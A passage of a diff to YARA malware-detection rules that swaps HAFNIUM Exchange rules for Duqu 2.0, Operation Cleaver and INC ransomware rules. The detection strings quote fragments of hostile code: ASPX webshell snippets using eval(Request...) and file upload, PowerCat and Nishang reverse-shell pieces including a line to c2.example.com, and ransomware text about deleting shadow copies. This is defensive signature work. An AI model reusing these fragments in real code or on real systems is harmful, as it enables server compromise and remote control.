+		(( uint16( 0 ) == 0x5a4d ) and ( ( any of ( $a* ) ) or ( all of ( $b* ) ) or ( all of ( $c* ) ) ) and filesize < 100000 ) or ( ( uint32( 0 ) == 0xe011cfd0 ) and ( ( any of ( $a* ) ) or ( all of ( $b* ) ) or ( all of ( $c* ) ) or ( any of ( $d* ) ) ) and filesize < 20000000 )
 }
-rule SIGNATURE_BASE_APT_WEBSHELL_HAFNIUM_Secchecker_Mar21_1 : FILE
+rule SIGNATURE_BASE_APT_Apt_Duqu2_Drivers : FILE
 {
 	meta:
-		description = "Detects HAFNIUM SecChecker webshell"
-		author = "Florian Roth (Nextron Systems)"
-		id = "73db3d78-7ece-53be-9efb-d19801993d5e"
-		date = "2021-03-05"
+		description = "Rule to detect Duqu 2.0 drivers"
+		author = "Kaspersky Lab"
+		id = "714d5151-9f80-582e-a628-1de9d83a072d"
+		date = "2015-06-09"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/markus_neis/status/1367794681237667840"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L18-L33"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_kaspersky_duqu2.yar#L40-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e0e4df860bdde7d5c277f596535c493d926095be6f46f6ba41b6177afbfc5cd9"
+		logic_hash = "023a51408f86814a8f810d0f89b185aca07dd60a1abb6de47f86ad8eeda4c4c4"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0"
+		version = "1.0"
 
 	strings:
-		$x1 = "<%if(System.IO.File.Exists(\"c:\\\\program files (x86)\\\\fireeye\\\\xagt.exe" ascii
-		$x2 = "\\csfalconservice.exe\")){Response.Write( \"3\");}%></head>" ascii fullword
+		$a1 = "\\DosDevices\\port_optimizer" wide nocase
+		$a2 = "romanian.antihacker"
+		$a3 = "PortOptimizerTermSrv" wide
+		$a4 = "ugly.gorilla1"
+		$b1 = "NdisIMCopySendCompletePerPacketInfo"
+		$b2 = "NdisReEnumerateProtocolBindings"
+		$b3 = "NdisOpenProtocolConfiguration"
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 1KB and 1 of them or 2 of them
+		uint16( 0 ) == 0x5A4D and ( any of ( $a* ) ) and ( 2 of ( $b* ) ) and filesize < 100000
 }
-rule SIGNATURE_BASE_APT_HAFNIUM_Forensic_Artefacts_Mar21_1
+rule SIGNATURE_BASE_Duqu2_Generic1 : FILE
 {
 	meta:
-		description = "Detects forensic artefacts found in HAFNIUM intrusions"
+		description = "Kaspersky APT Report - Duqu2 Sample - Generic Rule"
 		author = "Florian Roth (Nextron Systems)"
-		id = "872822b0-34d9-5ae4-a532-6a8786494fa9"
-		date = "2021-03-02"
+		id = "0e03eda5-d65b-5400-aceb-bc37559d9a6e"
+		date = "2015-06-10"
 		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L35-L48"
+		reference = "https://goo.gl/7yKyOj"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_kaspersky_duqu2.yar#L61-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eb86595956092506c2e29373faaf39a3987f9feed36a53b191bedd498db05cbb"
+		logic_hash = "742934198391bd30da654bf8efedc2a18c58dd0de357b2bcdbdbe8066187b0c2"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "3f9168facb13429105a749d35569d1e91465d313"
+		hash1 = "0a574234615fb2382d85cd6d1a250d6c437afecc"
+		hash2 = "38447ed1d5e3454fe17699f86c0039f30cc64cde"
+		hash3 = "5282d073ee1b3f6ce32222ccc2f6066e2ca9c172"
+		hash4 = "edfca3f0196788f7fde22bd92a8817a957c10c52"
+		hash5 = "6a4ffa6ca4d6fde8a30b6c8739785f4bd2b5c415"
+		hash6 = "00170bf9983e70e8dd4f7afe3a92ce1d12664467"
+		hash7 = "32f8689fd18c723339414618817edec6239b18f3"
+		hash8 = "f860acec9920bc009a1ad5991f3d5871c2613672"
+		hash9 = "413ba509e41c526373f991d1244bc7c7637d3e13"
+		hash10 = "29cd99a9b6d11a09615b3f9ef63f1f3cffe7ead8"
+		hash11 = "dfe1cb775719b529138e054e7246717304db00b1"
 
 	strings:
-		$s1 = "lsass.exe C:\\windows\\temp\\lsass" ascii wide fullword
-		$s2 = "c:\\ProgramData\\it.zip" ascii wide fullword
-		$s3 = "powercat.ps1'); powercat -c" ascii wide fullword
+		$s0 = "Global\\{B54E3268-DE1E-4c1e-A667-2596751403AD}" fullword wide
+		$s1 = "SetSecurityDescriptorSacl" fullword ascii
+		$s2 = "msisvc_32@" fullword wide
+		$s3 = "CompareStringA" fullword ascii
+		$s4 = "GetCommandLineW" fullword ascii
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
 }
-rule SIGNATURE_BASE_APT_WEBSHELL_HAFNIUM_Chopper_Webshell : APT HAFNIUM WEBSHELL FILE
+rule SIGNATURE_BASE_APT_Kaspersky_Duqu2_Procexp : FILE
 {
 	meta:
-		description = "Detects Chopper WebShell Injection Variant (not only Hafnium related)"
-		author = "Markus Neis,Swisscom"
-		id = "25dcf166-4aea-5680-b161-c5fc8d74b987"
-		date = "2021-03-05"
+		description = "Kaspersky APT Report - Duqu2 Sample - Malicious MSI"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d7fd48d5-2416-5eff-a751-ece09ce27767"
+		date = "2015-06-10"
 		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L50-L65"
+		reference = "https://goo.gl/7yKyOj"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_kaspersky_duqu2.yar#L92-L114"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c185a8da2a18fa59a8eeb36dbd95ba12c9c61717efc5f2d19d2d5b27ee243f2b"
+		logic_hash = "dd63f0eebc88fa0737905f20dc30dc968df81b7976a86ed8ed5646f7708c4b4a"
 		score = 75
 		quality = 85
-		tags = "APT, HAFNIUM, WEBSHELL, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2422835716066b6bcecb045ddd4f1fbc9486667a"
+		hash2 = "b120620b5d82b05fee2c2153ceaf305807fa9f79"
+		hash3 = "288ebfe21a71f83b5575dfcc92242579fb13910d"
 
 	strings:
-		$x1 = "runat=\"server\">" nocase
-		$s1 = "<script language=\"JScript\" runat=\"server\">function Page_Load(){eval(Request" nocase
-		$s2 = "protected void Page_Load(object sender, EventArgs e){System.IO.StreamWriter sw = new System.IO.StreamWriter(Request.Form[\"p\"] , false, Encoding.Default);sw.Write(Request.Form[\"f\"]);"
-		$s3 = "<script language=\"JScript\" runat=\"server\"> function Page_Load(){eval (Request[\"" nocase
+		$x1 = "svcmsi_32.dll" fullword wide
+		$x2 = "msi3_32.dll" fullword wide
+		$x3 = "msi4_32.dll" fullword wide
+		$x4 = "MSI.dll" fullword ascii
+		$s1 = "SELECT `Data` FROM `Binary` WHERE `Name`='%s%i'" fullword wide
+		$s2 = "Sysinternals installer" fullword wide
+		$s3 = "Process Explorer" fullword wide
 
 	condition:
-		filesize < 10KB and $x1 and 1 of ( $s* )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 1 of ( $x* ) ) and ( all of ( $s* ) )
 }
-rule SIGNATURE_BASE_APT_WEBSHELL_Tiny_Webshell : APT HAFNIUM WEBSHELL FILE
+rule SIGNATURE_BASE_APT_Kaspersky_Duqu2_Samsungprint : FILE
 {
 	meta:
-		description = "Detects WebShell Injection"
-		author = "Markus Neis,Swisscom"
-		id = "aa2fcecc-4c8b-570d-a81a-5dfb16c04e05"
-		date = "2021-03-05"
+		description = "Kaspersky APT Report - Duqu2 Sample"
+		author = "Florian Roth (Nextron Systems)"
+		id = "cc4bc00e-f38b-577f-8f00-637c0549894c"
+		date = "2015-06-10"
 		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L67-L82"
+		reference = "https://goo.gl/7yKyOj"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_kaspersky_duqu2.yar#L116-L134"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "099c8625c58b315b6c11f5baeb859f4c"
-		logic_hash = "9309f9b57353b6fe292048d00794699a8637a3e6e429c562fb36c7e459003a3b"
+		hash = "ce39f41eb4506805efca7993d3b0b506ab6776ca"
+		logic_hash = "9b2d80cfe3c47ac315b76c773acc3290668e06e4bbd99402e203b72af593fab8"
 		score = 75
 		quality = 85
-		tags = "APT, HAFNIUM, WEBSHELL, FILE"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "<%@ Page Language=\"Jscript\" Debug=true%>"
-		$s1 = "=Request.Form(\""
-		$s2 = "eval("
+		$s0 = "Installer for printer drivers and applications" fullword wide
+		$s1 = "msi4_32.dll" fullword wide
+		$s2 = "HASHVAL" fullword wide
+		$s3 = "SELECT `%s` FROM `%s` WHERE `%s`='CAData%i'" fullword wide
+		$s4 = "ca.dll" fullword ascii
+		$s5 = "Samsung Electronics Co., Ltd." fullword wide
 
 	condition:
-		filesize < 300 and all of ( $s* ) and $x1
+		uint16( 0 ) == 0x5a4d and filesize < 82KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_PS1_Powercat_Mar21 : FILE
+rule SIGNATURE_BASE_APT_Kaspersky_Duqu2_Msi3_32 : FILE
 {
 	meta:
-		description = "Detects PowerCat hacktool"
+		description = "Kaspersky APT Report - Duqu2 Sample"
 		author = "Florian Roth (Nextron Systems)"
-		id = "ae3963e8-2fe9-5bc3-bf72-95f136622832"
-		date = "2021-03-02"
+		id = "6cbea2e7-f406-57cf-b9c8-9d84b1480035"
+		date = "2015-06-10"
 		modified = "2023-12-05"
-		reference = "https://github.com/besimorhino/powercat"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L84-L103"
+		reference = "https://goo.gl/7yKyOj"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_kaspersky_duqu2.yar#L136-L157"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cbd5c6f7c5b4ed713482588ee4490a2326fe11cfaacfb3bfc6a6d94130a8bc83"
+		hash = "53d9ef9e0267f10cc10f78331a9e491b3211046b"
+		logic_hash = "718223d1ff82ffa0f3204e0cdaf0d441ed133f1f069d9ba2eb818bd3445f63ca"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c55672b5d2963969abe045fe75db52069d0300691d4f1f5923afeadf5353b9d2"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "powercat -l -p 8000 -r dns:10.1.1.1:53:c2.example.com" ascii fullword
-		$x2 = "try{[byte[]]$ReturnedData = $Encoding.GetBytes((IEX $CommandToExecute 2>&1 | Out-String))}" ascii fullword
-		$s1 = "Returning Encoded Payload..." ascii
-		$s2 = "$CommandToExecute =" ascii fullword
-		$s3 = "[alias(\"Execute\")][string]$e=\"\"," ascii
+		$s0 = "ProcessUserAccounts" fullword ascii
+		$s1 = "SELECT `UserName`, `Password`, `Attributes` FROM `CustomUserAccounts`" fullword wide
+		$s2 = "SELECT `UserName` FROM `CustomUserAccounts`" fullword wide
+		$s3 = "SELECT `Data` FROM `Binary` WHERE `Name`='CryptHash%i'" fullword wide
+		$s4 = "msi3_32.dll" fullword wide
+		$s5 = "RunDLL" fullword ascii
+		$s6 = "MSI Custom Action v3" fullword wide
+		$s7 = "msi3_32" fullword wide
+		$s8 = "Operating System" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x7566 and filesize < 200KB and 1 of ( $x* ) or 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 72KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_Nishang_PS1_Invoke_Powershelltcponeline
+rule SIGNATURE_BASE_MAL_RANSOM_INC_Aug24 : FILE
 {
 	meta:
-		description = "Detects PowerShell Oneliner in Nishang's repository"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0218ebbd-2dbe-5838-ab53-1e78e3f97b9e"
-		date = "2021-03-03"
+		description = "Detects INC ransomware and it's variants like Lynx"
+		author = "X__Junior"
+		id = "b776490b-f26a-55d9-bb26-ec3c617f070c"
+		date = "2024-08-08"
+		modified = "2024-12-12"
+		reference = "https://twitter.com/rivitna2/status/1701739812733014313"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_inc_ransomware.yar#L1-L30"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "335b92027c551d074015b830d137cf2fdee81d792cd7360f2499c83cc895fbbb"
+		score = 80
+		quality = 85
+		tags = "FILE"
+		hash1 = "eaa0e773eb593b0046452f420b6db8a47178c09e6db0fa68f6a2d42c3f48e3bc"
+		hash2 = "1754c9973bac8260412e5ec34bf5156f5bb157aa797f95ff4fc905439b74357a"
+
+	strings:
+		$s1 = "tarting full encryption in" wide
+		$s2 = "oad hidden drives" wide
+		$s3 = "ending note to printers" ascii
+		$s4 = "uccessfully delete shadow copies from %c:/" wide
+		$op1 = { 33 C9 03 C6 83 C0 02 0F 92 C1 F7 D9 0B C8 51 E8 }
+		$op2 = { 8B 44 24 [1-4] 6A 00 50 FF 35 ?? ?? ?? ?? 50 FF 15}
+		$op3 = { 57 50 8D 45 ?? C7 45 ?? 00 00 00 00 50 6A 00 6A 00 6A 02 6A 00 6A 02 C7 45 ?? 00 00 00 00 FF D6 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 04 8B F8 8D 45 ?? 50 8D 45 ?? 50 FF 75 ?? 57 6A 02 6A 00 6A 02 FF D6 }
+		$op4 = { 6A FF 8D 4? ?? 5? 8D 4? ?? 5? 8D 4? ?? 5? 5? FF 15 ?? ?? ?? ?? 85 C0 }
+		$op5 = { 56 6A 00 68 01 00 10 00 FF 15 ?? ?? ?? ?? 8B F0 83 FE FF 74 ?? 6A 00 56 FF 15 ?? ?? ?? ?? 68 88 13 00 00 56 FF 15 ?? ?? ?? ?? 56 FF 15}
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( 3 of ( $s* ) or 3 of ( $op* ) or ( 2 of ( $s* ) and 2 of ( $op* ) ) )
+}
+rule SIGNATURE_BASE_OPCLEAVER_Backdoorlogger
+{
+	meta:
+		description = "Keylogger used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "e9149baa-83c0-597f-833c-ea0241bb60e6"
+		date = "2014-12-02"
 		modified = "2023-12-05"
-		reference = "https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcpOneLine.ps1"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L105-L119"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L3-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "59622bff95de1077d26ee4547f37cd1045c0c1fc6817df40ff2564b33a962a07"
-		score = 75
+		logic_hash = "c7716b21e85d7e9fb1e1503071c6cd7dc2f4713051e0b03013e3d123a0d800a6"
+		score = 70
 		quality = 85
 		tags = ""
-		hash1 = "2f4c948974da341412ab742e14d8cdd33c1efa22b90135fcfae891f08494ac32"
 
 	strings:
-		$s1 = "=([text.encoding]::ASCII).GetBytes((iex $" ascii wide
-		$s2 = ".GetStream();[byte[]]$" ascii wide
-		$s3 = "New-Object Net.Sockets.TCPClient('" ascii wide
+		$s1 = "BackDoorLogger"
+		$s2 = "zhuAddress"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Simpleseesharp : WEBSHELL UNCLASSIFIED FILE
+rule SIGNATURE_BASE_OPCLEAVER_Jasus
 {
 	meta:
-		description = "A simple ASPX Webshell that allows an attacker to write further files to disk."
-		author = "threatintel@volexity.com"
-		id = "469fdf5c-e09e-5d44-a2e6-0864dcd0e18a"
-		date = "2021-03-01"
+		description = "ARP cache poisoner used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "8e04b258-e071-5974-9778-b9d0b97be8d5"
+		date = "2014-12-02"
 		modified = "2023-12-05"
-		reference = "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L121-L136"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L19-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "893cd3583b49cb706b3e55ecb2ed0757b977a21f5c72e041392d1256f31166e2"
-		logic_hash = "6f62249a68bae94e5cbdb4319ea5cde9dc071ec7a4760df3aafe78bc1e072c30"
-		score = 75
+		logic_hash = "7d6cd7f0f264a0bfdc6af422baa1a0e257cb8f4c39a2cb27a1edaf70201e8564"
+		score = 70
 		quality = 85
-		tags = "WEBSHELL, UNCLASSIFIED, FILE"
+		tags = ""
 
 	strings:
-		$header = "<%@ Page Language=\"C#\" %>"
-		$body = "<% HttpPostedFile thisFile = Request.Files[0];thisFile.SaveAs(Path.Combine"
+		$s1 = "pcap_dump_open"
+		$s2 = "Resolving IPs to poison..."
+		$s3 = "WARNNING: Gateway IP can not be found"
 
 	condition:
-		$header at 0 and $body and filesize < 1KB
+		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_CVE_2021_27065_Webshells : CVE_2021_27065 FILE
+rule SIGNATURE_BASE_OPCLEAVER_Loggermodule
 {
 	meta:
-		description = "Detects web shells dropped by CVE-2021-27065. All actors, not specific to HAFNIUM. TLP:WHITE"
-		author = "Joe Hannon, Microsoft Threat Intelligence Center (MSTIC)"
-		id = "27677f35-24a3-59cc-a3ad-b83884128da7"
-		date = "2021-03-05"
+		description = "Keylogger used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "949e7ff4-2102-5c89-83c9-f7ba64745661"
+		date = "2014-12-02"
 		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L182-L200"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L36-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "71795ba67bc8a4cea06b93da34b6291029ff74b200e37eb66f6ac51a6ff194cd"
-		score = 75
-		quality = 61
-		tags = "CVE-2021-27065, FILE"
+		logic_hash = "dd937bc3fc7054874a3c61bbef859dd8a8ec37872a30be6d3e1776957f98db80"
+		score = 70
+		quality = 85
+		tags = ""
 
 	strings:
-		$script1 = "script language" ascii wide nocase
-		$script2 = "page language" ascii wide nocase
-		$script3 = "runat=\"server\"" ascii wide nocase
-		$script4 = "/script" ascii wide nocase
-		$externalurl = "externalurl" ascii wide nocase
-		$internalurl = "internalurl" ascii wide nocase
-		$internalauthenticationmethods = "internalauthenticationmethods" ascii wide nocase
-		$extendedprotectiontokenchecking = "extendedprotectiontokenchecking" ascii wide nocase
+		$s1 = "%s-%02d%02d%02d%02d%02d.r"
+		$s2 = "C:\\Users\\%s\\AppData\\Cookies\\"
 
 	condition:
-		filesize < 50KB and any of ( $script* ) and ( $externalurl or $internalurl ) and $internalauthenticationmethods and $extendedprotectiontokenchecking
+		all of them
 }
-rule SIGNATURE_BASE_APT_MAL_ASPX_HAFNIUM_Chopper_Mar21_3 : FILE
+rule SIGNATURE_BASE_OPCLEAVER_Netc
 {
 	meta:
-		description = "Detects HAFNIUM ASPX files dropped on compromised servers"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9c2ba123-63c4-5e9c-a08f-bd9db3304691"
-		date = "2021-03-07"
+		description = "Net Crawler used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "68f32662-0d7d-5dfa-8bfd-ca41d383e19c"
+		date = "2014-12-02"
 		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L202-L216"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L52-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "391b366d78c2f24dc006a5365ec232a9a3c2fe0ea514b18897701ceeffcc81ca"
-		score = 85
+		logic_hash = "7da739c33da91f07e9e35ceab88a37477372998b4cf4b692b8d26cd1a4d936de"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "runat=\"server\">void Page_Load(object" ascii wide
-		$s2 = "Request.Files[0].SaveAs(Server.MapPath(" ascii wide
+		$s1 = "NetC.exe" wide
+		$s2 = "Net Service"
 
 	condition:
-		filesize < 50KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_MAL_ASPX_HAFNIUM_Chopper_Mar21_4 : FILE
+rule SIGNATURE_BASE_OPCLEAVER_Shellcreator2
 {
 	meta:
-		description = "Detects HAFNIUM ASPX files dropped on compromised servers"
-		author = "Florian Roth (Nextron Systems)"
-		id = "93f5b682-642d-5edf-84a9-296bf12cd72b"
-		date = "2021-03-07"
+		description = "Shell Creator used by attackers in Operation Cleaver to create ASPX web shells"
+		author = "Cylance Inc."
+		id = "b62336c3-39e5-55f8-98df-6c2a2cb0764a"
+		date = "2014-12-02"
 		modified = "2023-12-05"
-		reference = "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L218-L233"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L68-L82"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "933ab74a0e30e2a728444d491c9eb0ff134db05d905aeb48efe3ba65674a3730"
-		score = 85
-		quality = 79
-		tags = "FILE"
+		logic_hash = "5422cf4e4809c1183c3c9870d9a5ddcf806082d8cae81a014255f5f18576101d"
+		score = 70
+		quality = 85
+		tags = ""
 
 	strings:
-		$s1 = "<%@Page Language=\"Jscript\"%>" ascii wide nocase
-		$s2 = ".FromBase64String(" ascii wide nocase
-		$s3 = "eval(System.Text.Encoding." ascii wide nocase
+		$s1 = "ShellCreator2.Properties"
+		$s2 = "set_IV"
 
 	condition:
-		filesize < 850 and all of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_HAFNIUM_Forensicartefacts_WER_Mar21_1 : CVE_2021_26857 FILE
+rule SIGNATURE_BASE_OPCLEAVER_Smartcopy2
 {
 	meta:
-		description = "Detects a Windows Error Report (WER) that indicates and exploitation attempt of the Exchange server as described in CVE-2021-26857 after the corresponding patches have been applied. WER files won't be written upon successful exploitation before applying the patch. Therefore, this indicates an unsuccessful attempt."
-		author = "Florian Roth (Nextron Systems)"
-		id = "06771101-10ce-5d6b-99f7-a321aade7f69"
-		date = "2021-03-07"
+		description = "Malware or hack tool used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "898d9060-208a-5dfb-a452-50ab49b80a9d"
+		date = "2014-12-02"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/cyb3rops/status/1368471533048446976"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L235-L250"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L84-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2e135cb47f9fb5ca19ee1058fa6b4f39c098d2dfbab69bc19e80412ab695f126"
-		score = 40
+		logic_hash = "5b83588fa80558cd387511d38e9d1c51c488216b9cd27e848d8bdc59cd8ce348"
+		score = 70
 		quality = 85
-		tags = "CVE-2021-26857, FILE"
+		tags = ""
 
 	strings:
-		$s1 = "AppPath=c:\\windows\\system32\\inetsrv\\w3wp.exe" wide fullword
-		$s7 = ".Value=w3wp#MSExchangeECPAppPool" wide
+		$s1 = "SmartCopy2.Properties"
+		$s2 = "ZhuFrameWork"
 
 	condition:
-		uint16( 0 ) == 0xfeff and filesize < 8KB and all of them
+		all of them
 }
-rule SIGNATURE_BASE_APT_HAFNIUM_Forensicartefacts_Cab_Recon_Mar21_1 : FILE
+rule SIGNATURE_BASE_OPCLEAVER_Synflooder
 {
 	meta:
-		description = "Detects suspicious CAB files used by HAFNIUM for recon activity"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b0caf9d9-af0a-5181-85e4-6091cd6699e3"
-		date = "2021-03-11"
+		description = "Malware or hack tool used by attackers in Operation Cleaver"
+		author = "Cylance Inc."
+		id = "bdaf02f4-1226-569b-9f55-999be7ff397a"
+		date = "2014-12-02"
 		modified = "2023-12-05"
-		reference = "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3?u=dstepanic"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hafnium.yar#L252-L273"
+		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L100-L115"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "de3acb2d01ad14d73263af9e62ef7c715cde259e3f2fbbcbbb41d55589c3f0ab"
+		logic_hash = "b5349931c4eb5733f9bf05e7cfac6a434063a01d802665f70384cb29d9ae2a3d"
 		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$s1 = "ip.txt" ascii fullword
-		$s2 = "arp.txt" ascii fullword
-		$s3 = "system" ascii fullword
-		$s4 = "security" ascii fullword
+		$s1 = "Unable to resolve [ %s ]. ErrorCode %d"
+		$s2 = "s IP is : %s"
+		$s3 = "Raw TCP Socket Created successfully."
 
 	condition:
-		uint32( 0 ) == 0x4643534d and filesize < 10000KB and ( $s1 in ( 0 .. 200 ) and $s2 in ( 0 .. 200 ) and $s3 in ( 0 .. 200 ) and $s4 in ( 0 .. 200 ) )
+		all of them
 }
-rule SIGNATURE_BASE_WEBSHELL_Compiled_Webshell_Mar2021_1 : FILE
+rule SIGNATURE_BASE_OPCLEAVER_Tinyzbot
 {
 	meta:
-		description = "Triggers on temporary pe files containing strings commonly used in webshells."
-		author = "Bundesamt fuer Sicherheit in der Informationstechnik"
